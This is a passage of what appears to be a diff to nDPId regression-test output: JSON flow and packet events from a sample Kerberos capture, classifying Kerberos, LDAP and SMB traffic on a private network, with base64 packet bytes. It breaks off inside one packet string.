-00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952265,"flow_last_seen":1549337952266,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952265,"flow_last_seen":1549337952266,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952280,"flow_last_seen":1549337952281,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952280,"flow_last_seen":1549337952281,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00704{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931189,"flow_last_seen":1549337931190,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931189,"flow_last_seen":1549337931190,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937690,"flow_last_seen":1549337937691,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937690,"flow_last_seen":1549337937691,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937700,"flow_last_seen":1549337937701,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937700,"flow_last_seen":1549337937701,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":262,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":262,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952273,"flow_last_seen":1549337952274,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952273,"flow_last_seen":1549337952274,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929817,"flow_last_seen":1549337929818,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929817,"flow_last_seen":1549337929818,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931220,"flow_last_seen":1549337931221,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931220,"flow_last_seen":1549337931221,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00774{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1549337929790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337929790,"pkt":"pB9ywglqAAgCHEeuCABFAAEXABdAAIAGkNisEAjJrBAICMAFAFiynbRHbznTnlAYAQAf5QAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC2pvaG5zb24tcGMkohAbDmhhcHB5Y3JhZnQub3JnoyMwIaADAgECoRowGBsGa3JidGd0Gw5oYXBweWNyYWZ0Lm9yZ6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBE7AFheoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="} +00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1549337929790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337929790,"pkt":"AAgCHEeupB9ywglqCABFAAE+ExRAAIAGfbSsEAgIrBAIyQBYwAVvOdOesp21NlAYAQCkkQAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OFqlBQIDBjUgpgMCARmpEBsOaGFwcHljcmFmdC5vcmeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDmhhcHB5Y3JhZnQub3JnrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="} +00729{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7560000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00882{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1549337929811,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337929811,"pkt":"pB9ywglqAAgCHEeuCABFAAFnABtAAIAGkISsEAjJrBAICMAGAFganBtaQ2U1slAYAQDaGgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4YERcga5zFfjuo7+oqo0hJ6Udj7efOwOKKYJj6PKpxuETgzDcdt27IvGW9sEQ18QPUV\/drVuLVBwwEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLam9obnNvbi1wYySiEBsOaGFwcHljcmFmdC5vcmejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDmhhcHB5Y3JhZnQub3JnpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIETsAWF6gVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} +00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7560000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1549337929812,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337929812,"pkt":"AAgCHEeupB9ywglqCABFAACYExlAAIAGflWsEAgIrBAIyQBYwAZDZTtmGpwcmVAYAQDnsgAAX5hri3Z\/opje40K53kwDKo2\/CTegm0pJkWpLVNFlnn\/MakUFXqKHv4CDtH2CbQqvJq\/ecJgxH2EwrzVmUcQk2zqXXjIwbkyszZ9\/Xc6IEgQ4qiI64lPzINS7ueVTbdUXk\/8v52QxoGdMilBjjWTAcQ=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337929815,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1549337929815,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337929815,"pkt":"pB9ywglqAAgCHEeuCABFAACxACFAAIAGkTSsEAjJrBAICMAHAFgBsoC8gS4auFAYAQDUqQAAiNeE+tCJIo9Cz1KFHGicigIlxkFIEVkb70vifDKvvi6NwB24GlkehWdocuUvESpeAqtSofWtuKDm2yskVOheE+r4DxaQxRLncJy9zYBP+p7ofQvBukmarkg+oY3ctA8jgj5BSy2yi42NlxJjhcjuX3ByLG+GD20zq41Le0TbPh0TFS5qkRb0Q24="} +00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1549337929815,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337929815,"pkt":"AAgCHEeupB9ywglqCABFAACbEx9AAIAGfkysEAgIrBAIyQBYwAeBLiBsAbKBRVAYAQBP\/wAA1H56bb56rLTzhI\/so6pGl6jILu03bHY2ZWl4A41JY07Kavo1sQRKhlNPx3vE\/LdSF6BX6NLW1Fm3Tdmvr7ZEbPWOq8FZs9c0RBY7wJbwPUW44FlC0vhqJn1yGB3K1Fxl0gPqAAMzMrhupJQMQzjV4fgdag=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02387{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1549337929816,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1485,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1485,"pkt_l4_len":1451,"thread_ts_msec":1549337929816,"pkt":"pB9ywglqAAgCHEeuCABFAAW\/ACZAAIAGjCGsEAjJrBAICMAIAFgkzleN\/pyBM1AYAQCd1QAAAAAFk2yCBY8wggWLoQMCAQWiAwIBDKOCBRcwggUTMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1l4LwpNuTjPo\/WSca61wgawIInNQ2vTGqwCxtV1QigPfApKXxUIq16oPsvd5TUFFBoZ3psSaal0IeVBLFx\/BX1XOMXvlpVRB9MsTpZwTQ9ax1GLB6I2i5bbUZpknsnBAKrSXL695P06nXI2pxBPckcoFwJAlSBEmG2XByE8IS7rO1EarXMbJ6Y6aTY3qAJfaaRab4vHhRG2Vuf+5JWuR5w1NLPXeeoD\/rArSk0gCVLkR21SKfZcS\/vqPldqO0np7TLmMBVoYjsl6PiI0+4z2cMBft\/qbxRIxb8y1vWhjoJ64ue7lCoT2cvFOdVWD\